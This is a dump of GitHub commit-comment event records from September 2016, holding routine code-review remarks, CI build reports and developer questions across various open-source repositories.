{"id":"4601537396","type":"CommitCommentEvent","actor":{"login":"ojw28"},"repo":{"name":"google/ExoPlayer"},"payload":{"comment":{"id":19127707,"position":null,"line":null,"path":null,"commit_id":"42e10c762543b2bdcb5517ab5fdfd583a59a479d","created_at":"2016-09-22T10:11:19Z","updated_at":"2016-09-22T10:11:19Z","body":"Yup, I can do that. Thanks!"}},"created_at":"2016-09-22T10:11:19Z"}
{"id":"4601539922","type":"CommitCommentEvent","actor":{"login":"CxTest"},"repo":{"name":"CxTest/CxRepository"},"payload":{"comment":{"id":19127712,"position":null,"line":null,"path":null,"commit_id":"dc83cc8a4b4da3bba96765258bfa33a19adb1117","created_at":"2016-09-22T10:11:52Z","updated_at":"2016-09-22T10:11:52Z","body":"INTEGRATION TESTING_2016-09-22 13:11:50"}},"created_at":"2016-09-22T10:11:52Z"}
{"id":"4601540022","type":"CommitCommentEvent","actor":{"login":"CxTest"},"repo":{"name":"CxTest/CxRepository"},"payload":{"comment":{"id":19127713,"position":null,"line":null,"path":null,"commit_id":"dc83cc8a4b4da3bba96765258bfa33a19adb1117","created_at":"2016-09-22T10:11:53Z","updated_at":"2016-09-22T10:11:53Z","body":"INTEGRATION TESTING_2016-09-22 13:11:52"}},"created_at":"2016-09-22T10:11:53Z"}
{"id":"4601546394","type":"CommitCommentEvent","actor":{"login":"hbrunn"},"repo":{"name":"OCA/web"},"payload":{"comment":{"id":19127729,"position":null,"line":null,"path":null,"commit_id":"76bc2ad19f61da23d0a476a5b9f4278a03e1a0e2","created_at":"2016-09-22T10:13:16Z","updated_at":"2016-09-22T10:13:16Z","body":"why is this unneeded? Did v9 finally abandon the different ways of encoding many2one fields and it's always a `(id, name)` tuple?"}},"created_at":"2016-09-22T10:13:16Z"}
{"id":"4601547190","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127732,"position":null,"line":null,"path":null,"commit_id":"0acacce89af1339b7fd1b49729f4b4cdc0ed2574","created_at":"2016-09-22T10:13:26Z","updated_at":"2016-09-22T10:13:26Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1106](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13892&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 246, ignored: 3 Build time: 00:09:04"}},"created_at":"2016-09-22T10:13:26Z"}
{"id":"4601552018","type":"CommitCommentEvent","actor":{"login":"TorsteinHonsi"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":19127737,"position":5,"line":181,"path":"js/modules/drilldown.src.js","commit_id":"790324044242398d8067d0539db27837872e5415","created_at":"2016-09-22T10:14:29Z","updated_at":"2016-09-22T10:14:29Z","body":"Absolutely. Thanks!"}},"created_at":"2016-09-22T10:14:29Z"}
{"id":"4601557926","type":"CommitCommentEvent","actor":{"login":"patou"},"repo":{"name":"angular/angular-fr"},"payload":{"comment":{"id":19127746,"position":null,"line":null,"path":null,"commit_id":"4a3250cf27f8ebfd3e39bbbf59f77db1548402fa","created_at":"2016-09-22T10:15:49Z","updated_at":"2016-09-22T10:15:49Z","body":"Yes, if you look at all other file, there two version.\r\n\r\nThere a javascript who hide the english text (the first html tag). You can display the english version below the text with a button on the top of the page (look at the chinese version : https://angular.cn/docs/ts/latest/guide/)\r\nIf there are no english text, the script will hide one sentence of two."}},"created_at":"2016-09-22T10:15:49Z"}
{"id":"4601558743","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127750,"position":null,"line":null,"path":null,"commit_id":"d0be2bbe741a1af074ad51ac5f7c70ac65bb7866","created_at":"2016-09-22T10:16:00Z","updated_at":"2016-09-22T10:16:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1107](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13898&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T10:16:00Z"}
{"id":"4601559058","type":"CommitCommentEvent","actor":{"login":"navd"},"repo":{"name":"mitmedg/CliCon"},"payload":{"comment":{"id":19127751,"position":16,"line":69,"path":"cliner/features_dir/read_config.py","commit_id":"8443e3f568ccfefb0c458d8654f81f21a00f42a7","created_at":"2016-09-22T10:16:05Z","updated_at":"2016-09-22T10:16:05Z","body":"can you please guide me with how to get the file word2vec_embeddings.bin file to be defined in config.txt."}},"created_at":"2016-09-22T10:16:05Z"}
{"id":"4601559659","type":"CommitCommentEvent","actor":{"login":"malahal"},"repo":{"name":"ganltc/nfs-ganesha"},"payload":{"comment":{"id":19127753,"position":null,"line":null,"path":null,"commit_id":"b895fedfd0bc1dd229acac75ff264dd8b4ced7ac","created_at":"2016-09-22T10:16:13Z","updated_at":"2016-09-22T10:16:13Z","body":"Looks good to me. Test and make sure this patch works with root squashed envs."}},"created_at":"2016-09-22T10:16:13Z"}
{"id":"4601560492","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19127756,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T10:16:24Z","updated_at":"2016-09-22T10:16:24Z","body":"it's works now 40 minutes ... I stay tuned"}},"created_at":"2016-09-22T10:16:24Z"}
{"id":"4601560573","type":"CommitCommentEvent","actor":{"login":"alonsogarciapablo"},"repo":{"name":"CartoDB/cartodb.js"},"payload":{"comment":{"id":19127757,"position":null,"line":null,"path":null,"commit_id":"f481bc14f223f95fbf403946bb5bd899eac14b6c","created_at":"2016-09-22T10:16:26Z","updated_at":"2016-09-22T10:16:26Z","body":"cc: @rochoa this is how we're \"adapting\" CartoCSS rules to legend model attributes. Perhaps this helps you understand how cdb.js is using the data returned by the maps API. Also, would love to hear your thoughts about this approach (using this \"adapters'), since you probably had a similar idea when you worked on this... thx!"}},"created_at":"2016-09-22T10:16:26Z"}
{"id":"4601563301","type":"CommitCommentEvent","actor":{"login":"jcalovski"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":19127768,"position":null,"line":null,"path":null,"commit_id":"63ebf19b6e5bbea0ebdfd1adafc6952d3950bf46","created_at":"2016-09-22T10:17:02Z","updated_at":"2016-09-22T10:17:02Z","body":"Any tips?"}},"created_at":"2016-09-22T10:17:02Z"}
{"id":"4601563321","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19127769,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T10:17:02Z","updated_at":"2016-09-22T10:17:02Z","body":"radare2 -a arm -m 0x0800C000  -b 16 -i flash.r ../../firmware/unwrapped/D013.020.img\r\n[0x0800c000]> pd $s >asm.lst\r\n"}},"created_at":"2016-09-22T10:17:02Z"}
{"id":"4601569197","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/web"},"payload":{"comment":{"id":19127785,"position":null,"line":null,"path":null,"commit_id":"76bc2ad19f61da23d0a476a5b9f4278a03e1a0e2","created_at":"2016-09-22T10:18:21Z","updated_at":"2016-09-22T10:18:21Z","body":"I was about to write you to ask for your approval. It seems that the read_ids method finally return an homogeneous structure, and many2one are returned with the name_get correctly retrieved (the same style as in XML-RPC), so I see this code not needed. I'm making tests with my implementation in https://github.com/Tecnativa/sale-workflow/tree/9.0-sale_order_variant_mgmt/sale_order_variant_mgmt and I can't find any problem"}},"created_at":"2016-09-22T10:18:21Z"}
{"id":"4601570388","type":"CommitCommentEvent","actor":{"login":"assimTest"},"repo":{"name":"assimTest/myeroTest"},"payload":{"comment":{"id":19127788,"position":null,"line":null,"path":null,"commit_id":"016d61d47c5ce6643ed0edd3d96a84252c46d023","created_at":"2016-09-22T10:18:38Z","updated_at":"2016-09-22T10:18:38Z","body":"dsgga"}},"created_at":"2016-09-22T10:18:38Z"}
{"id":"4601572789","type":"CommitCommentEvent","actor":{"login":"the-kenny"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19127799,"position":null,"line":null,"path":null,"commit_id":"01e44ac1f9af1d42ee9b5000426b780f2a03c948","created_at":"2016-09-22T10:19:14Z","updated_at":"2016-09-22T10:19:14Z","body":"I might have exaggerated a bit, true. We should still find a consent on when to remove old packages and when we shouldn't.\r\n\r\nDo you want to open a PR to bring back `emacs24` or do you want me to do that? (I'm fine with either one)"}},"created_at":"2016-09-22T10:19:14Z"}
{"id":"4601574419","type":"CommitCommentEvent","actor":{"login":"GregOnNet"},"repo":{"name":"Angular2Buch/workshop-mse"},"payload":{"comment":{"id":19127802,"position":null,"line":null,"path":null,"commit_id":"cde2f5c163be846ef01b87ed4099fa5718c34698","created_at":"2016-09-22T10:19:37Z","updated_at":"2016-09-22T10:19:37Z","body":"👍  Thanks"}},"created_at":"2016-09-22T10:19:37Z"}
{"id":"4601576742","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"yasu80/dotfiles"},"payload":{"comment":{"id":19127810,"position":null,"line":null,"path":null,"commit_id":"1cf9ea575ba99450b7311cbacb43382d6626e361","created_at":"2016-09-22T10:20:10Z","updated_at":"2016-09-22T10:20:10Z","body":"っダブルクオーテーション(\")orシングルクオーテーション(')"}},"created_at":"2016-09-22T10:20:10Z"}
{"id":"4601577436","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19127813,"position":null,"line":null,"path":null,"commit_id":"b7104784c28bc7be91a0ee5c0cae25560a34bf74","created_at":"2016-09-22T10:20:19Z","updated_at":"2016-09-22T10:20:19Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#W4NDz5IrSXi9fL3US2Y7Hw"}},"created_at":"2016-09-22T10:20:19Z"}
{"id":"4601578527","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"yasu80/dotfiles"},"payload":{"comment":{"id":19127817,"position":null,"line":null,"path":null,"commit_id":"1cf9ea575ba99450b7311cbacb43382d6626e361","created_at":"2016-09-22T10:20:34Z","updated_at":"2016-09-22T10:20:34Z","body":"つーか俺のshellScripts読めよ("}},"created_at":"2016-09-22T10:20:34Z"}
{"id":"4601579119","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":19127819,"position":null,"line":null,"path":null,"commit_id":"63ebf19b6e5bbea0ebdfd1adafc6952d3950bf46","created_at":"2016-09-22T10:20:42Z","updated_at":"2016-09-22T10:20:42Z","body":"Maybe try:\r\n`int material =  pos.count<BISHOP>(strongSideMg) \r\n                   + pos.count<KNIGHT>(strongSideMg) \r\n                   + pos.count<ROOK  >(strongSideMg) \r\n                   + 2 * pos.count<QUEEN >(strongSideMg);\r\n                         \r\n sfMg = ScaleFactor(56 + material);`"}},"created_at":"2016-09-22T10:20:42Z"}
{"id":"4601588557","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"MelanieCLopez/Guadalayians"},"payload":{"comment":{"id":19127840,"position":null,"line":null,"path":null,"commit_id":"16e6ce92f3ddae39ea9b1e059d59e21e3c92848e","created_at":"2016-09-22T10:22:48Z","updated_at":"2016-09-22T10:22:48Z","body":"[@web-flow HTTP://zodiactruth.com/wp-content/uploads/2012/04/29_jpg](url)"}},"created_at":"2016-09-22T10:22:48Z"}
{"id":"4601596551","type":"CommitCommentEvent","actor":{"login":"benjaoming"},"repo":{"name":"django-money/django-money"},"payload":{"comment":{"id":19127858,"position":null,"line":null,"path":null,"commit_id":"1ac711612be9312301e43fb76c88cc998f176fb0","created_at":"2016-09-22T10:24:36Z","updated_at":"2016-09-22T10:24:36Z","body":"Sorry, this should be solved now -- pre-commit hooks and Travis linting were running different isort configs somehow.\r\n\r\n'twas fixed by adding moneyed as an explicitly known module in setup.cfg."}},"created_at":"2016-09-22T10:24:36Z"}
{"id":"4601596707","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"yasu80/dotfiles"},"payload":{"comment":{"id":19127859,"position":null,"line":null,"path":null,"commit_id":"f30396fb9bdcf7703a69f2d0012cbf6f1ea9bf89","created_at":"2016-09-22T10:24:38Z","updated_at":"2016-09-22T10:24:38Z","body":"Hey @yasu80 \r\nPATH は先に書いた方から解釈されるから、後ろにつけたすと万が一かぶった際に自分のが走らないぜ。\r\n\r\n```bash\r\nexport PATH=\"/home/yasu16/shells:$PATH\"\r\n```\r\n\r\nがお勧めだ。"}},"created_at":"2016-09-22T10:24:38Z"}
{"id":"4601600012","type":"CommitCommentEvent","actor":{"login":"Totoix"},"repo":{"name":"burmjeff/packages_apps_bonovoapps"},"payload":{"comment":{"id":19127862,"position":null,"line":null,"path":null,"commit_id":"3e5b20e7ef8035509fb89412704978707c2b01eb","created_at":"2016-09-22T10:25:21Z","updated_at":"2016-09-22T10:25:21Z","body":"Will this fork be merged? I want to compile NU3001 from scratch with these changes."}},"created_at":"2016-09-22T10:25:21Z"}
{"id":"4601606019","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19127874,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T10:26:43Z","updated_at":"2016-09-22T10:26:43Z","body":"correct!"}},"created_at":"2016-09-22T10:26:43Z"}
{"id":"4601611000","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127880,"position":null,"line":null,"path":null,"commit_id":"d0be2bbe741a1af074ad51ac5f7c70ac65bb7866","created_at":"2016-09-22T10:27:51Z","updated_at":"2016-09-22T10:27:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1107](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13898&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:11:51"}},"created_at":"2016-09-22T10:27:51Z"}
{"id":"4601615251","type":"CommitCommentEvent","actor":{"login":"jorgemarcial"},"repo":{"name":"jorgemarcial/TableBundle"},"payload":{"comment":{"id":19127895,"position":null,"line":null,"path":null,"commit_id":"84964c9d71e7687c3359f717783e8fb2501fbd6f","created_at":"2016-09-22T10:28:51Z","updated_at":"2016-09-22T10:28:51Z","body":"SELECT * FROM `EXAMPLE_TABLE` ex\r\nLEFT JOIN `id` ex2 ON ex.id = ex2.id"}},"created_at":"2016-09-22T10:28:51Z"}
{"id":"4601616589","type":"CommitCommentEvent","actor":{"login":"makoni"},"repo":{"name":"bryx-inc/BRYXBanner"},"payload":{"comment":{"id":19127905,"position":null,"line":null,"path":null,"commit_id":"14690e5ae70fe642745c839f2bef202646432479","created_at":"2016-09-22T10:29:09Z","updated_at":"2016-09-22T10:29:09Z","body":"Confirm, this one broke Carthage support."}},"created_at":"2016-09-22T10:29:09Z"}
{"id":"4601619236","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19127916,"position":8,"line":57,"path":"app/Http/routes.php","commit_id":"2944b6f92dca913a9c6bded35ed277bff65a3601","created_at":"2016-09-22T10:29:46Z","updated_at":"2016-09-22T10:29:46Z","body":"Oh yeah it is!"}},"created_at":"2016-09-22T10:29:46Z"}
{"id":"4601622541","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19127925,"position":15,"line":15,"path":"database/migrations/2016_09_19_143412_create_links_table.php","commit_id":"2944b6f92dca913a9c6bded35ed277bff65a3601","created_at":"2016-09-22T10:30:31Z","updated_at":"2016-09-22T10:30:31Z","body":"Yeah I should have defined a one to one relationship between ```Member``` and ```Link```"}},"created_at":"2016-09-22T10:30:31Z"}
{"id":"4601626662","type":"CommitCommentEvent","actor":{"login":"hbrunn"},"repo":{"name":"OCA/web"},"payload":{"comment":{"id":19127935,"position":null,"line":null,"path":null,"commit_id":"76bc2ad19f61da23d0a476a5b9f4278a03e1a0e2","created_at":"2016-09-22T10:31:29Z","updated_at":"2016-09-22T10:31:29Z","body":"great! And if it turns out we need this for some corner case, we simply readd it. I'm happy with this, should also make the widget load faster"}},"created_at":"2016-09-22T10:31:29Z"}
{"id":"4601628347","type":"CommitCommentEvent","actor":{"login":"richeshchouksey-innoplexus"},"repo":{"name":"commoncrawl/cc-quick-scripts"},"payload":{"comment":{"id":19127939,"position":16,"line":14,"path":"set_acl/set_acl.py","commit_id":"aad62097ba63630167cea035915d4339dd12fc14","created_at":"2016-09-22T10:31:53Z","updated_at":"2016-09-22T10:31:53Z","body":";l[pkliojohj"}},"created_at":"2016-09-22T10:31:53Z"}
{"id":"4601628936","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19127941,"position":11,"line":531,"path":"src/psl.c","commit_id":"9e1ca81be4b1d658ac5a7a5f312d5ada3a9ba6b0","created_at":"2016-09-22T10:32:02Z","updated_at":"2016-09-22T10:32:02Z","body":"Why cast via `void*`?"}},"created_at":"2016-09-22T10:32:02Z"}
{"id":"4601631795","type":"CommitCommentEvent","actor":{"login":"Alternativend"},"repo":{"name":"Alternativend/ddns"},"payload":{"comment":{"id":19127950,"position":null,"line":null,"path":null,"commit_id":"40c4294a312510d2ea9306abd126b0dc7a29bab9","created_at":"2016-09-22T10:32:42Z","updated_at":"2016-09-22T10:32:42Z","body":"Hi,\r\nwould you please add this commit? Im running this on 25 machines now and i have to modify the providers.py after every update by hand because my changes are gone. "}},"created_at":"2016-09-22T10:32:42Z"}
{"id":"4601636617","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19127957,"position":6,"line":6,"path":"database/migrations/2016_09_19_144156_create_internships_table.php","commit_id":"2944b6f92dca913a9c6bded35ed277bff65a3601","created_at":"2016-09-22T10:33:50Z","updated_at":"2016-09-22T10:33:50Z","body":"Yes, in theory it could if we have a need for it!"}},"created_at":"2016-09-22T10:33:50Z"}
{"id":"4601639844","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19127962,"position":null,"line":null,"path":null,"commit_id":"be49ee5145169a92fd9fc06827a1e6ba7ca0385b","created_at":"2016-09-22T10:34:33Z","updated_at":"2016-09-22T10:34:33Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1769 of 1769 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T10:34:33Z"}
{"id":"4601641609","type":"CommitCommentEvent","actor":{"login":"axot"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19127966,"position":null,"line":null,"path":null,"commit_id":"248fdfcf7356f2c20ab1e6afd1e9f295d08331c7","created_at":"2016-09-22T10:34:57Z","updated_at":"2016-09-22T10:34:57Z","body":"Okay, Thank you"}},"created_at":"2016-09-22T10:34:57Z"}
{"id":"4601642377","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"MelanieCLopez/Guadalayians"},"payload":{"comment":{"id":19127969,"position":null,"line":null,"path":null,"commit_id":"16e6ce92f3ddae39ea9b1e059d59e21e3c92848e","created_at":"2016-09-22T10:35:09Z","updated_at":"2016-09-22T10:35:09Z","body":"![29 ara_-300x241 1](https://cloud.githubusercontent.com/assets/22220964/18745036/8beddcf8-8075-11e6-99cc-2b2208d9c7d5.jpg)\r\n"}},"created_at":"2016-09-22T10:35:09Z"}
{"id":"4601643827","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19127977,"position":null,"line":null,"path":null,"commit_id":"be49ee5145169a92fd9fc06827a1e6ba7ca0385b","created_at":"2016-09-22T10:35:30Z","updated_at":"2016-09-22T10:35:30Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T10:35:30Z"}
{"id":"4601644647","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"MelanieCLopez/Guadalayians"},"payload":{"comment":{"id":19127980,"position":null,"line":null,"path":null,"commit_id":"16e6ce92f3ddae39ea9b1e059d59e21e3c92848e","created_at":"2016-09-22T10:35:42Z","updated_at":"2016-09-22T10:35:42Z","body":"The Astrological sign 13 sign"}},"created_at":"2016-09-22T10:35:42Z"}
{"id":"4601644905","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/web"},"payload":{"comment":{"id":19127982,"position":null,"line":null,"path":null,"commit_id":"76bc2ad19f61da23d0a476a5b9f4278a03e1a0e2","created_at":"2016-09-22T10:35:46Z","updated_at":"2016-09-22T10:35:46Z","body":"Yeah, it seems so. You can try in runbot when this module gets merged and I'll propose the other one. I'll ping you when done."}},"created_at":"2016-09-22T10:35:46Z"}
{"id":"4601645807","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19127983,"position":null,"line":null,"path":null,"commit_id":"01e44ac1f9af1d42ee9b5000426b780f2a03c948","created_at":"2016-09-22T10:35:59Z","updated_at":"2016-09-22T10:35:59Z","body":"I am at a conference right now and it's hard for me to do focused work. If you could add Emacs24 again, then that would be really cool. Otherwise I'll do it later next week, when I'm back home.\n"}},"created_at":"2016-09-22T10:35:59Z"}
{"id":"4601645926","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"MelanieCLopez/Guadalayians"},"payload":{"comment":{"id":19127984,"position":null,"line":null,"path":null,"commit_id":"16e6ce92f3ddae39ea9b1e059d59e21e3c92848e","created_at":"2016-09-22T10:36:00Z","updated_at":"2016-09-22T10:36:00Z","body":"This is what I believe it to be"}},"created_at":"2016-09-22T10:36:00Z"}
{"id":"4601648525","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19127992,"position":null,"line":null,"path":null,"commit_id":"3286faef7ca05a84e94729fe64a3805ebc1b777a","created_at":"2016-09-22T10:36:36Z","updated_at":"2016-09-22T10:36:36Z","body":"Yeah I did. I was trying to combine stuff in two different project directories manually (which is really bad) and messed up a little"}},"created_at":"2016-09-22T10:36:36Z"}
{"id":"4601652615","type":"CommitCommentEvent","actor":{"login":"manaskocharekar"},"repo":{"name":"manaskocharekar/python"},"payload":{"comment":{"id":19128006,"position":1,"line":1,"path":"manas.py","commit_id":"3242ea5199207496ee553509fa7efcf5e8dbc1df","created_at":"2016-09-22T10:37:37Z","updated_at":"2016-09-22T10:37:37Z","body":"chukya"}},"created_at":"2016-09-22T10:37:37Z"}
{"id":"4601653606","type":"CommitCommentEvent","actor":{"login":"humility0310"},"repo":{"name":"humility0310/practice06"},"payload":{"comment":{"id":19128009,"position":null,"line":null,"path":null,"commit_id":"ca3271d647034ca10531c090160bfa2f424c359a","created_at":"2016-09-22T10:37:54Z","updated_at":"2016-09-22T10:37:54Z","body":"바른말 고운말을 씁시다."}},"created_at":"2016-09-22T10:37:54Z"}
{"id":"4601655581","type":"CommitCommentEvent","actor":{"login":"orgkhnargh"},"repo":{"name":"platformio/platformio-api"},"payload":{"comment":{"id":19128015,"position":null,"line":null,"path":null,"commit_id":"86a55f80d9671f139619b5f2bb997a2bdaafd46f","created_at":"2016-09-22T10:38:22Z","updated_at":"2016-09-22T10:38:22Z","body":":cry: "}},"created_at":"2016-09-22T10:38:22Z"}
{"id":"4601655749","type":"CommitCommentEvent","actor":{"login":"SK-28RUS"},"repo":{"name":"havena/GOAT-King-Of-The-Hill"},"payload":{"comment":{"id":19128017,"position":null,"line":null,"path":null,"commit_id":"e6a095c63e31e0cebf5ca8ace2937b9a5d824e16","created_at":"2016-09-22T10:38:24Z","updated_at":"2016-09-22T10:38:24Z","body":"Where can I download the mod (@Arma2Net) for this mission?\r\nI tried several sources, but the mission is not working as it should ... ("}},"created_at":"2016-09-22T10:38:24Z"}
{"id":"4601656864","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19128020,"position":null,"line":null,"path":null,"commit_id":"89a2214f5e9b3170f741fc57fb6c3d24f1008940","created_at":"2016-09-22T10:38:42Z","updated_at":"2016-09-22T10:38:42Z","body":"develop (Unknown) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2361 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-89a2214f5e9b3170f741fc57fb6c3d24f1008940-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-89a2214f5e9b3170f741fc57fb6c3d24f1008940-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.45%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T10:38:42Z"}
{"id":"4601656957","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/everypolitician-data"},"payload":{"comment":{"id":19128021,"position":null,"line":null,"path":null,"commit_id":"6988ee577323044f1966f44ca0597e4c170bd037","created_at":"2016-09-22T10:38:43Z","updated_at":"2016-09-22T10:38:43Z","body":"You seem to have done a lot more in this commit than just update the scraper location. It's generally better to isolate the change to the `instructions.json` from the resulting data changes, e.g. so that you could cherry-pick it out separately into something where the data would be different and have clashes galore."}},"created_at":"2016-09-22T10:38:43Z"}
{"id":"4601658098","type":"CommitCommentEvent","actor":{"login":"Stranger6667"},"repo":{"name":"django-money/django-money"},"payload":{"comment":{"id":19128024,"position":null,"line":null,"path":null,"commit_id":"1ac711612be9312301e43fb76c88cc998f176fb0","created_at":"2016-09-22T10:39:00Z","updated_at":"2016-09-22T10:39:00Z","body":"Should it be like this now?\r\nhttps://github.com/django-money/django-money/pull/228"}},"created_at":"2016-09-22T10:39:00Z"}
{"id":"4601661788","type":"CommitCommentEvent","actor":{"login":"SK-28RUS"},"repo":{"name":"wastelandgoats/KingOfTheHill"},"payload":{"comment":{"id":19128031,"position":null,"line":null,"path":null,"commit_id":"b7d9e214d82f9981b1ad8137fb2aca46a8c8b7a7","created_at":"2016-09-22T10:39:56Z","updated_at":"2016-09-22T10:39:56Z","body":"https://github.com/havena/GOAT-King-Of-The-Hill\r\n\r\nWhere can I download the mod for this mission?\r\nI tried several sources, but the mission is not working as it should ... ("}},"created_at":"2016-09-22T10:39:56Z"}
{"id":"4601662149","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19128033,"position":null,"line":null,"path":null,"commit_id":"768f91c227d48ab39b4e06a49a222a01cb8f4e3e","created_at":"2016-09-22T10:40:02Z","updated_at":"2016-09-22T10:40:02Z","body":"Trying to find a fix for this now."}},"created_at":"2016-09-22T10:40:02Z"}
{"id":"4601663260","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128036,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T10:40:19Z","updated_at":"2016-09-22T10:40:19Z","body":"now pd $s works 60 minutes  :( "}},"created_at":"2016-09-22T10:40:19Z"}
